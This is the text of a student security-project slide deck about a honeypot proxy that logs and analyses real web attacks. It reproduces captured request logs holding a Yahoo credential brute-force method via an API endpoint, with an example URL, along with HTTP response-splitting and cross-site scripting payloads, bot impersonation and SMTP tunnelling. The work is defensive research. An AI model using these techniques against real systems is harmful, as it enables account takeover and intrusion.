Web Security Project Creating an anonymous proxy server to monitor and Analyze new web based attacks Mentors : Amichai Shulman Eldad Chai Students : Nadav Amit Dani Daniel
Feb 25, 2016
Web Security Project
Web Security ProjectCreating an anonymous proxy server to monitor andAnalyze new web based attacks
Mentors: Amichai ShulmanEldad Chai
Students:Nadav AmitDani Daniel1Main Goals 1. Being able to log real malicious web based attacks. 2. Identify new malicious web attacks. 3. Determine which attacks are in common use in order to be able to focus on defending against them.
Main Objectives 1. Creating a working stable anonymous proxy server that can log real web based attacks Web hackers usually use anonymous servers to avoid getting detected.2. Creating a tool that can analyze the logs in order to detect patterns of web based attacks and create statistics of common used attacks. Project Goals & Objectives2
Proxy ServerOn VMWareHoney PotMachine
Computer AComputer BHacker
Web ServerProject Architecture
Data Search & Index Tool
3
Highly Anonymous Proxy
4Architecture Components1. Proxy Server Unix based machine Installed on a VMWare machine (easy to reconstruct if attacked)Based on a Privoxy server, writes all connections logs to local files. The server also runs an FTP server to allow easy extraction of data.GeoIP API is used to analyze the source IP of attackers Encoding of low ascii characters is preformed to help attack analyzing (like EOF etc.). Cron job for archiving the logs2. Backup AgentCobian BackupUnzip script
3. Splunk Data indexing and search toolEnables logging of known attacksEnables query and analysis of accessesFields and tags were created in order to allow easy data extraction.
5Samples Of IdentifiedMaliciousWeb Attacks6Attack Purpose retrieve Yahoo login credentials.
Attack Scenario- Around the world there are many Yahoo severs (to allow share loading, backup etc..), The communication Between these servers is done through a web API.
Yahoo Brute Force Attack
Hackers use this interfaceTo impersonate servers and Retrieve users credentials!
7How Is It Done?If you just try to login to yahoo too many times you will be requested to decode a Captcha, But if you just use the following API /config/isp_verify_user?l=&p=Against a yahoo server you can verify that a certain username exists, and than brute force to verify Which password grants access to the account.
For Example - http://124.108.120.50/config/isp_verify_user?l=israel&p=israeli
Attack Method using anonymous proxies to try logging in with multiple use names and passwords on Yahoo servers. Since there are many Yahoo servers around the world which are not synchronized, it is possible to try many of them. In addition, once you add Proxy servers into the equation (by multiplying) - you get even more
YahooBrute Force Attack8
YahooBrute Force Attack
Many tools to do so using with and without proxies:
9Yahoo Brute Force Attack
This diagram demonstrates the amount of attempts through our proxy in a 10 day period.This is only from our proxy!
In Blue successful attacks
In Red response 999, meaning the server detected the attack.edit.yahoo.comlogin.yahoo.comedit.europe.yahoo.comedit.in.yahoo.come4.edit.cnb.yahoo.come3.yahoo.co.kredit.vip.tpe.yahoo.coml30.login.scd.yahoo.come3.member.ukl.yahoo.come1.member.ukl.yahoo.come2.member.ukl.yahoo.come4.member.ukl.yahoo.come5.member.ukl.yahoo.come6.member.ukl.yahoo.comsbc1.login.dcn.yahoo.come3.edit.cnb.yahoo.coml2.login.dcn.yahoo.coml3.login.dcn.yahoo.com
l4.login.dcn.yahoo.coml5.login.dcn.yahoo.coml6.login.dcn.yahoo.coml7.login.dcn.yahoo.coml8.login.dcn.yahoo.coml9.login.dcn.yahoo.coml10.login.dcn.yahoo.coml11.login.dcn.yahoo.coml12.login.dcn.yahoo.coml13.login.dcn.yahoo.coml14.login.dcn.yahoo.coml15.login.dcn.yahoo.coml16.login.dcn.yahoo.coml18.login.dcn.yahoo.coml19.login.dcn.yahoo.coml20.login.dcn.yahoo.coml22.login.dcn.yahoo.coml23.login.dcn.yahoo.com
l29.login.dcn.yahoo.coml30.login.dcn.yahoo.comsbc1.login.vip.dcn.yahoo.come1.edit.vip.sc5.yahoo.coml1.login.scd.yahoo.coml2.login.scd.yahoo.coml3.login.scd.yahoo.coml4.login.scd.yahoo.coml5.login.scd.yahoo.coml6.login.scd.yahoo.coml7.login.scd.yahoo.coml8.login.scd.yahoo.coml9.login.scd.yahoo.coml10.login.scd.yahoo.coml11.login.scd.yahoo.coml12.login.scd.yahoo.coml13.login.scd.yahoo.coml15.login.scd.yahoo.com
10Typical Attack headers - Jun 06 12:22:06.101 b2caeb90 Analysis: ip: 24.86.107.62Country: CanadaGET /config/isp_verify_user?l=hu.&p=lillian HTTP/1.0Host: 203.212.170.100Referer:http://203.212.170.100Accept-Language: enX-Forwarded-For:77.125.93.72:8118,yahoo.comCookie: Y=v=1-;Connection: close
Jun 06 12:22:06.292 b34afb90 Analysis: ip: 201.68.195.20Country: BrazilGET /config/isp_verify_user?l=angel_annabel&p=2020 HTTP/1.0Host: 124.108.120.50YahooRemoteIP: 217.12.5.161Referer:http://124.108.120.50Accept-Language: enConnection: CloseX-Forwarded-For: 69.147.112.216,google.comAccept: */*
Jun 06 12:22:10.483 a7497b90 Analysis: ip: 75.184.119.157Country: United StatesGET /config/login?.patner=sbc&login=david+2&passwd=flag&.save=1 HTTP/1.0Connection: closeAccept: */*Accept: -Language: enHost:l05.member.re3.yahoo.comYahoo Brute Force Attack11Attack Description
The essence of HTTP Response Splitting is the attacker's ability to send a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response
Typical Attack headers
May 30 00:03:58.496 73c84b90 Analysis: ip: 89.149.242.190ICountry: GermanyGET /lnv/viewHTTP/1.1%20200%20OK%0D%0ADate:%20Sat,%2030%20May%202009%2003:54:07%20GMT%0D%0AServer:%20Apache/1.3.28%20(Unix)%20PHP/4.3.4%0D%0AX-Powered-By:%20PHP/4.3.4%0D%0ASet-Cookie:%20PHPSESSID=6019eb9689437d8b69f93967be7544a9;%20path=/;%20domain=.sundojungmil.co.kr%0D%0AExpires:%20Thu,%2019%20Nov%201981%2008:52:00%20GMT%0D%0ACache-Control:%20no-store,%20no-cache,%20must-revalidate,%20post-check=0,%20pre-check=0%0D%0APragma:%20no-cache%0D%0AConnection:%20close%0D%0ATransfer-Encoding:%20chunked%0D%0AContent-Type:%20text/html%0D%0A%0D%0Ae3d%0D%0A%0D%0A%3Cscript%20language= HTTP/1.1Connection: closeHost: forums.lenovo.comResponse Splitting Attack12Attack Description
Taking advantage of a security vulnerabilitytypically found inweb applicationswhich allowcode injectionby malicious web users into theweb pagesviewed by other users
Typical Attack headers
May 29 22:20:32.730 7f452b90 Analysis: ip: 60.16.140.154ICountry: ChinaGET / HTTP/1.0Referer: js/bdsug.js?v=1.1.0.3>')};window.onunload=function(){};window.onload=function(){document.forms[0http://www.baidu.com/s?ie=gb2312&bs=%B1%F9%E4%BF%C1%E8&sr=&z=&cl=3&f=8&wd=%B1%F9%E4%BF%C1%E8%B0%CD%C8%F0%BF%CB%B1%F9%E4%BF&ct=0Accept: */*Accept-Language: zh-cn,en-usCookie: BAIDUID=33549062C228F38D3ACF4C8FDF85D5C2:FG=1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Hotbar 4.1.8.0; RogueCleaner; Alexa Toolbar)Host: www.baidu.comPragma: no-cacheConnection: closeCross-Site Scripting Attack13Attack Description
Impersonate Google/Msn bots to access forums and internet sites to insert malicious data. Typical Attack headers
Jun 06 00:28:48.276 8acf1b90 Analysis: ip: 123.149.121.132ICountry: ChinaGET /forum-20-1.html HTTP/1.0Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)Host: xgymcn.5d6d.comPragma: no-cacheConnection: closeBots Impersonation Attack14Attack Description
Typical Attack headers Jun 01 17:22:28.436 add54b90 Analysis: ip: 217.86.183.71ICountry: GermanyCONNECT 205.188.251.21:443 HTTP/1.0Host: 205.188.251.21:443Connection: closeSMTP over HTTP Attack
One client can send roughly 500,000 e-mails per hour![http://en.wikipedia.org/wiki/Dark_Mailer]15Automatic posting in forumsClick frauds (simulates clicks to earn money, vote in poles etc.)
Other Attacks
16Attack Types17Attacks by Server TypeServers Distribution in the Internethttp://news.netcraft.com/archives/web_server_survey.htmlServers Attacks18Originating CountriesDependent of posted website and Proxy location19Thank You.20